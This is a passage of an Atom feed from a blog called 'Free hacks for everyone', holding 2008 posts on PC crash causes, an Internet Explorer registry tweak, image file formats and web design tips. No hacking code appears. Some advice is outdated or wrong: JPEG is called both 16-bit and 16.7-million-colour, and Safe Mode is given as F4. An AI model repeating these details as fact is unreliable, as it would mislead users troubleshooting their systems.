<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2811100680510495731</id><updated>2012-02-16T19:17:33.481-08:00</updated><title type='text'>Free hacks for everyone</title><subtitle type='html'>Hacking guides, Hacking tools, Rapidshare Hacking, Hacking tutorials, Hacking solutions</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>96</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-8658955397672409817</id><published>2008-10-06T23:42:00.001-07:00</published><updated>2008-10-06T23:42:28.762-07:00</updated><title type='text'>10 reasons why the internet crashes!!</title><content type='html'>&lt;p&gt;&lt;font size="3"&gt;&lt;font color="#3366ff"&gt;Think of the time when you are working on an important document and suddenly your computer crashes. 
You would not be happy with this happening&amp;nbsp;to you. So here are some reasons why the PC crashes and how to handle the crashes.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;strong&gt;1 Hardware conflict&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;The number one reason why Windows crashes is hardware conflict. Each hardware device communicates with other devices through an interrupt request channel (IRQ). These are supposed to be unique to each device.&lt;br /&gt;&lt;br /&gt;For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.&lt;br /&gt;&lt;br /&gt;If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:&lt;br /&gt;&lt;br /&gt;* Start-Settings-Control Panel-System-Device Manager.&lt;br /&gt;&lt;br /&gt;Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the same IRQ number appears twice, two devices may be using it.&lt;br /&gt;&lt;br /&gt;Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.&lt;br /&gt;&lt;br /&gt;When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.&lt;br /&gt;&lt;br /&gt;To be fair to Microsoft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. 
Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font size="3"&gt;2 Bad Ram&lt;/font&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.&lt;br /&gt;&lt;br /&gt;But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.&lt;br /&gt;&lt;br /&gt;One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.&lt;br /&gt;&lt;br /&gt;Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.&lt;br /&gt;&lt;br /&gt;EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.&lt;br /&gt;&lt;br /&gt;&lt;font size="3"&gt;&lt;strong&gt;3 BIOS settings&lt;/strong&gt;&lt;br /&gt;&lt;/font&gt;Every motherboard is supplied with a range of chipset settings that are decided in the factory. 
A common way to access these settings is to press the F2 or Delete key during the first few seconds of a boot-up.&lt;br /&gt;&lt;br /&gt;Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.&lt;br /&gt;&lt;br /&gt;A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.&lt;br /&gt;&lt;br /&gt;Microsoft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is set to 'yes' to allow Windows to do this).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font size="3"&gt;4 Hard disk drives&lt;/font&gt;&lt;/strong&gt;&lt;br /&gt;After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. 
It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to&lt;br /&gt;&lt;br /&gt;* Start-Programs-Accessories-System Tools-Disk Defragmenter&lt;br /&gt;&lt;br /&gt;This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.&lt;br /&gt;&lt;br /&gt;The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).&lt;br /&gt;&lt;br /&gt;Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to&lt;br /&gt;&lt;br /&gt;* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.&lt;br /&gt;&lt;br /&gt;Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.&lt;br /&gt;&lt;br /&gt;Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to&lt;br /&gt;&lt;br /&gt;* Start-Programs-Accessories-System Tools-ScanDisk&lt;br /&gt;&lt;br /&gt;Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font size="3"&gt;5 Fatal OE exceptions and VXD errors&lt;br /&gt;&lt;/font&gt;&lt;/strong&gt;&lt;br /&gt;Fatal OE exception errors and VXD errors are often caused by video card problems.&lt;br /&gt;&lt;br /&gt;These can often be resolved easily by reducing the resolution of the video display. 
Go to&lt;br /&gt;&lt;br /&gt;* Start-Settings-Control Panel-Display-Settings&lt;br /&gt;&lt;br /&gt;Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.&lt;br /&gt;&lt;br /&gt;If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to&lt;br /&gt;&lt;br /&gt;* Start-Settings-Control Panel-System-Device Manager&lt;br /&gt;&lt;br /&gt;Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press Properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.&lt;br /&gt;&lt;br /&gt;If you have a video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.&lt;br /&gt;&lt;br /&gt;The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. 
You are searching for a setting that will display a No Conflicts message.&lt;br /&gt;&lt;br /&gt;Another useful way to resolve video problems is to go to&lt;br /&gt;&lt;br /&gt;* Start-Settings-Control Panel-System-Performance-Graphics&lt;br /&gt;&lt;br /&gt;Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).&lt;br /&gt;&lt;br /&gt;Look up your video card's manufacturer on the internet and search for the most recent drivers for it.&lt;br /&gt;&lt;br /&gt;&lt;font size="3"&gt;&lt;strong&gt;6 Viruses&lt;/strong&gt;&lt;br /&gt;&lt;/font&gt;Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to&lt;br /&gt;&lt;br /&gt;* Start-Settings-Control Panel-Add/Remove Programs&lt;br /&gt;&lt;br /&gt;Here, look for the Start Up Disk tab. 
Virus protection requires constant vigilance.&lt;br /&gt;&lt;br /&gt;A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the web-site of your antivirus software manufacturer.&lt;br /&gt;&lt;font size="3"&gt;&lt;strong&gt;7 Printers&lt;/strong&gt;&lt;br /&gt;&lt;/font&gt;&lt;br /&gt;The action of sending a document to print creates a bigger file, often called a postscript file.&lt;br /&gt;&lt;br /&gt;Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.&lt;br /&gt;&lt;br /&gt;If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.&lt;br /&gt;&lt;br /&gt;&lt;font size="3"&gt;&lt;strong&gt;8 Software&lt;/strong&gt;&lt;br /&gt;&lt;/font&gt;&lt;br /&gt;A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.&lt;br /&gt;&lt;br /&gt;The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. 
It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4, Windows 2000 and Windows XP.&lt;br /&gt;&lt;br /&gt;Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.&lt;br /&gt;&lt;br /&gt;Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.&lt;br /&gt;&lt;br /&gt;Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.&lt;br /&gt;&lt;br /&gt;Remember to restore all the BIOS settings back to their former settings following installation.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font size="3"&gt;9 Overheating&lt;/font&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.&lt;br /&gt;&lt;br /&gt;CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font size="3"&gt;10 Power supply problems&lt;/font&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.&lt;br /&gt;&lt;br /&gt;If this has become a nuisance for you then consider buying an uninterruptible power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.&lt;br /&gt;&lt;br /&gt;It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;strong&gt;&lt;font color="#ff0000"&gt;Note:&lt;/font&gt; There can also be many other reasons besides these, so don&amp;rsquo;t rely on these totally.&lt;/strong&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-8658955397672409817?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/8658955397672409817/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=8658955397672409817' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8658955397672409817'/><link rel='self' 
type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/8658955397672409817'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/10/10-reasons-why-internet-crashes.html' title='10 reasons why the internet crashes!!'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-6626041228658614114</id><published>2008-10-06T23:23:00.000-07:00</published><updated>2008-10-06T23:24:14.460-07:00</updated><title type='text'>Increase speed of internet explorer</title><content type='html'>&lt;p&gt;You must always have wanted to increase the speed of HTTP requests in Internet Explorer without much effort. So here is your wish fulfilled.&lt;/p&gt; &lt;p&gt;To comply with current Internet standards, Internet Explorer limits the number of simultaneous downloads to two downloads, plus one queued download. This configuration is a function of the browser. 
However, as connection speeds increase, and the number of total connections that are allowed to Internet servers increases, the two-connection limit may be restrictive.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;Please Note:&lt;/span&gt; Changing the maximum number of connections beyond two is a violation of Internet standards; use at your own risk!&lt;br /&gt;&lt;br /&gt;To increase the number of simultaneous connections that are allowed, follow these steps:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1. Start the Registry Editor&lt;br /&gt;2. Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;br /&gt;3. Select New &gt; DWORD Value from the Edit menu&lt;br /&gt;4. Name the new value MaxConnectionsPer1_0Server&lt;br /&gt;5. Right-click the MaxConnectionsPer1_0Server value and choose Modify&lt;br /&gt;6. Under Base, click the radio button next to Decimal&lt;br /&gt;7. In the Value Data: box enter the number of simultaneous connections you want to set (for example 10 is a good value)&lt;br /&gt;8. Click OK&lt;br /&gt;9. Repeat steps 3 to 8 using the new value MaxConnectionsPerServer&lt;br /&gt;10. 
Exit the registry editor&lt;/strong&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-6626041228658614114?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/6626041228658614114/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=6626041228658614114' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6626041228658614114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/6626041228658614114'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/10/increase-speed-of-internet-explorer.html' title='Increase speed of internet explorer'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-560990224162693178</id><published>2008-10-06T23:01:00.001-07:00</published><updated>2008-10-06T23:04:54.949-07:00</updated><title type='text'>Image formats</title><content type='html'>&lt;font size="3"&gt;&lt;font face="Arial"&gt;&lt;strong&gt;There are many graphic file formats, if we include the proprietary types. The PNG, JPEG, and GIF formats are most often used to display images on the Internet. 
These graphic formats are listed and briefly described below, separated into the two main families of graphics&lt;/strong&gt;: &lt;font style="COLOR: rgb(0,51,0)"&gt;&lt;font style="COLOR: rgb(51,204,0)"&gt;raster and vector&lt;/font&gt;.&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;/font&gt;&lt;font face="Trebuchet MS"&gt;&lt;font size="5"&gt;&lt;font style="COLOR: rgb(0,0,102)"&gt;Image file formats &lt;/font&gt;&lt;font style="FONT-WEIGHT: bold"&gt;(raster)&lt;/font&gt;&lt;br /&gt;&lt;/font&gt;&lt;br /&gt;&lt;font style="FONT-WEIGHT: bold; COLOR: rgb(0,0,153)"&gt;PNG&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;The PNG (Portable Network Graphics) file format was designed as, and is regarded as, the free and open successor to the GIF file format. The PNG file format supports true color (16 million colors) whereas the GIF file format only allows 256 colors. PNG excels when the image has large areas of uniform color. The lossless PNG format is best suited for editing pictures, and lossy formats like JPG are best for final distribution of photographic-type images because of their smaller file size. Many older browsers do not yet support the PNG file format. Adam7 interlacing allows an early preview even when only a small percentage of the image data has been transmitted.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;JPEG&lt;/font&gt;&lt;br /&gt;&lt;/strong&gt;The JPEG (Joint Photographic Experts Group) image files are a lossy format. The DOS filename extension is JPG, although other operating systems may use JPEG. Nearly all digital cameras have the option to save images in JPEG format. The JPEG format supports 16-bit color and produces relatively small file sizes. Fortunately, the compression in most cases does not detract noticeably from the image. But JPEG files do suffer generational degradation when repeatedly edited and saved. 
Photographic images are best stored in a lossless non-JPEG format if they will be re-edited in future, or if the presence of small "artifacts" (blemishes), due to the nature of the JPEG compression algorithm, is unacceptable. JPEG is also used as the image compression algorithm in many Adobe PDF files. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;TIFF&lt;/font&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;The TIFF (Tagged Image File Format) is a flexible image format that normally uses a filename extension of TIFF or TIF. TIFF's flexibility is both a feature and a curse, with no single reader capable of handling all the different varieties of TIFF files. TIFF can be lossy or lossless. Some types of TIFF offer relatively good lossless compression for bi-level (black and white, no grey) images. Some high-end digital cameras have the option to save images in the TIFF format, using the LZW compression algorithm for lossless storage. The TIFF image format is not widely supported by web browsers, and should not be used on the World Wide Web. TIFF is still widely accepted as a photograph file standard in the printing industry. TIFF is capable of handling device-specific color spaces, such as the CMYK defined by a particular set of printing press inks. &lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;RAW&lt;/font&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;&lt;br /&gt;&lt;/font&gt;&lt;font face="Trebuchet MS" size="3"&gt;The RAW image format is a file option available on some digital cameras. It usually uses a lossless compression and produces file sizes much smaller than the TIFF format. Unfortunately, the RAW format is not standard among all camera manufacturers and some graphic programs and image editors may not accept the RAW format. 
The better graphic editors can read some manufacturers' RAW formats, and some (mostly higher-end) digital cameras also support saving images in the TIFF format directly. There are also separate tools available for converting digital camera raw image format files into other formats, one such tool being Dave Coffin's dcraw, which is made available under a combination of GNU General Public License and public domain licenses. &lt;br /&gt;&lt;br /&gt;Adobe's Digital Negative Specification is a recent (September 2004) attempt at standardizing the various "raw" file formats used by digital cameras.&lt;br /&gt;&lt;br /&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;&lt;strong&gt;GIF&lt;/strong&gt;&lt;/font&gt;&lt;br /&gt;&lt;/font&gt;&lt;font style="FONT-WEIGHT: bold"&gt;&lt;br /&gt;&lt;/font&gt;&lt;font face="Trebuchet MS" size="3"&gt;GIF (Graphic Interchange Format) is limited to an 8-bit palette, or 256 colors. This makes the GIF format suitable for storing graphics with relatively few colors such as simple diagrams, shapes and cartoon style images. The GIF format supports animation and is still widely used to provide image animation effects. &lt;br /&gt;&lt;br /&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;&lt;strong&gt;BMP&lt;/strong&gt;&lt;/font&gt;&lt;br /&gt;&lt;/font&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;&lt;br /&gt;&lt;/font&gt;&lt;font face="Trebuchet MS" size="3"&gt;The BMP (bit mapped) format is used internally in the Microsoft Windows operating system to handle graphics images. These files are typically not compressed, resulting in large files. The main advantage of BMP files is their wide acceptance and use in Windows programs. Their large size makes them unsuitable for file transfer. Desktop backgrounds and images from scanners are usually stored in BMP files. 
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;XPM&lt;/font&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/font&gt;&lt;font style="FONT-WEIGHT: bold"&gt;&lt;br /&gt;&lt;/font&gt;&lt;font face="Trebuchet MS" size="3"&gt;The XPM format is the default X Window System picture format (very popular in the Linux world). Its structure is based on the string format of the C programming language. Because XPM was designed to be human-readable, and is stored as uncompressed plain-text, the file size of these pictures can be more than twice as large as uncompressed binary bitmap files (such as BMP, uncompressed TIFF, MacOS-PICT, or Irix-RGB formats). This format is unsupported by most non-Unix software and operating systems (though many web-browsers retain display support for the XBM subset, which was the minimal image format in the early days of the WWW). &lt;br /&gt;&lt;/font&gt;&lt;font style="FONT-WEIGHT: bold"&gt;&lt;br /&gt;&lt;/font&gt;&lt;font size="3"&gt;&lt;font face="Trebuchet MS"&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;&lt;font style="FONT-WEIGHT: bold"&gt;MrSID&lt;/font&gt;&lt;/font&gt;&lt;br /&gt;&lt;/font&gt;&lt;/font&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;&lt;br /&gt;&lt;/font&gt;&lt;font size="3"&gt;&lt;font face="Trebuchet MS"&gt;The MrSID (Multiresolution Seamless Image Database) format is a wavelet compression format used mostly by Geographic Information Systems to store massive satellite imagery for map software.&lt;br /&gt;&lt;br /&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;&lt;u&gt;Vector formats&lt;/u&gt;&lt;/font&gt;&lt;br /&gt;As opposed to the raster image formats above (where the data describes the characteristics of each individual pixel), vector image formats contain a geometric description which can be rendered smoothly at any desired display size. 
&lt;br /&gt;&lt;br /&gt;&lt;font style="FONT-WEIGHT: bold"&gt;&lt;font style="COLOR: rgb(0,0,255)"&gt;SVG&lt;/font&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;SVG (Scalable Vector Graphics) is an open standard created and developed by the World Wide Web Consortium to address the need (and attempts of several corporations) for a versatile, scriptable and all-purpose vector format for the web and otherwise. The SVG format does not have a compression scheme of its own, but due to the textual nature of XML, an SVG graphic can be compressed using a program such as gzip. Because of its scripting potential, SVG is a &lt;br /&gt;key component in web applications: interactive web pages that look and act like applications &lt;br /&gt;&lt;br /&gt;GIF and JPEG are currently the primary file types for graphics on the Internet. This article provides an overview of each of them, as well as when each format should be used.&lt;br /&gt;&lt;br /&gt;&lt;font style="FONT-WEIGHT: bold; COLOR: rgb(0,0,255)"&gt;The GIF Format&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;The GIF format is one of the most popular formats on the Internet. Not only is the format excellent at compressing areas of images with large areas of the same color, but it is also the only option for putting animation online (unless you want to use Flash or other vector-based animation formats, which typically cost more). The GIF89a format also supports transparency, and interlacing. &lt;br /&gt;&lt;br /&gt;GIF files support a maximum of 256 colors, which makes them practical for almost all graphics except photographs. The most common method of reducing the size of GIF files is to reduce the number of colors on the palette. 
It is important to note that GIF already uses the LZW compression scheme internally to make images as small as possible without losing any data &lt;br /&gt;&lt;br /&gt;&lt;/font&gt;&lt;strong&gt;&lt;font face="Trebuchet MS"&gt;When to use them&lt;br /&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;font size="3"&gt;&lt;font face="Trebuchet MS"&gt;Generally, GIF files should be used for logos, line drawings and icons. Avoid using it for photographic images, and graphics which have long stretches of continuous-tone in them. When you're designing GIF files, avoid using gradients and turn off anti- aliasing where possible to minimize the file size. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font style="FONT-WEIGHT: bold; COLOR: rgb(0,0,255)"&gt;The JPEG Format&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;The JPEG format, with its support for 16.7 million colors, is primarily intended for photographic images. The internal compression algorithm of the JPEG format, unlike the GIF format, actually throws out information. Depending on what settings you use, the thrown out data may or may not be visible to the eye. 
Once you lower the quality of an image, and save it, the extra data cannot be regained so be sure to save the orginal &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/font&gt;&lt;font face="Trebuchet MS"&gt;&lt;strong&gt;When to use&lt;br /&gt;&lt;/strong&gt;As a rule, the JPEG format should be used on photographic images, and images which do not look as good with only 256 colors.&lt;/font&gt;&lt;/font&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-560990224162693178?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/560990224162693178/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=560990224162693178' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/560990224162693178'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/560990224162693178'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2008/10/image-formats_06.html' title='Image formats'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-8246812277336457658</id><published>2008-03-25T01:53:00.000-07:00</published><updated>2008-03-25T01:55:51.565-07:00</updated><title type='text'>12 Great Tips and tricks of Web designing</title><content type='html'>Here are 12 great tips and tricks from professional web designers:&lt;br 
/&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.1:&lt;/strong&gt;&lt;br /&gt;Put Important Information Near the Top. Organize your pages from the top down.&lt;br /&gt;Important info should be easy to find.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.2:&lt;/strong&gt; Limit Length of Pages. Two or three screens should be the maximum length of any page.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.3:&lt;/strong&gt; Make Navigation Simple. Be consistent in your placement of navigational tools, i.e. menus, buttons, etc. Make Images As Small As Possible. Reduce the physical size of images in a paint program before placing them in your web page.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.4:&lt;/strong&gt; Use the Web Palette (216 colors). This keeps files small and makes images look good on all monitors and systems.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.5:&lt;/strong&gt; Use GIF and JPEG Properly. Use JPEG for photos and GIF for everything else.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.6:&lt;/strong&gt; Avoid Busy Backgrounds. Text should be easy to read.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.7:&lt;/strong&gt; Make sure you have enough contrast.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.8:&lt;/strong&gt; Use the ALT Parameter (low-res and/or text) for Images. This is important for people viewing your pages with older computers.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.9:&lt;/strong&gt; Avoid Excessive Animation.
Don’t animate images unless you have a good reason – it can be very irritating.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.10:&lt;/strong&gt; Use Tables to Format Text and Images. This is the best way to control your layout.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.11:&lt;/strong&gt; Use Common Fonts. This ensures that everyone sees your page as you designed it.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tip and trick No.12:&lt;/strong&gt; Don’t Center Entire Pages. Use this only for titles and special situations.&lt;br /&gt;&lt;br /&gt;These are the basic tips and tricks of Web designing...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-8246812277336457658?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/8246812277336457658/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 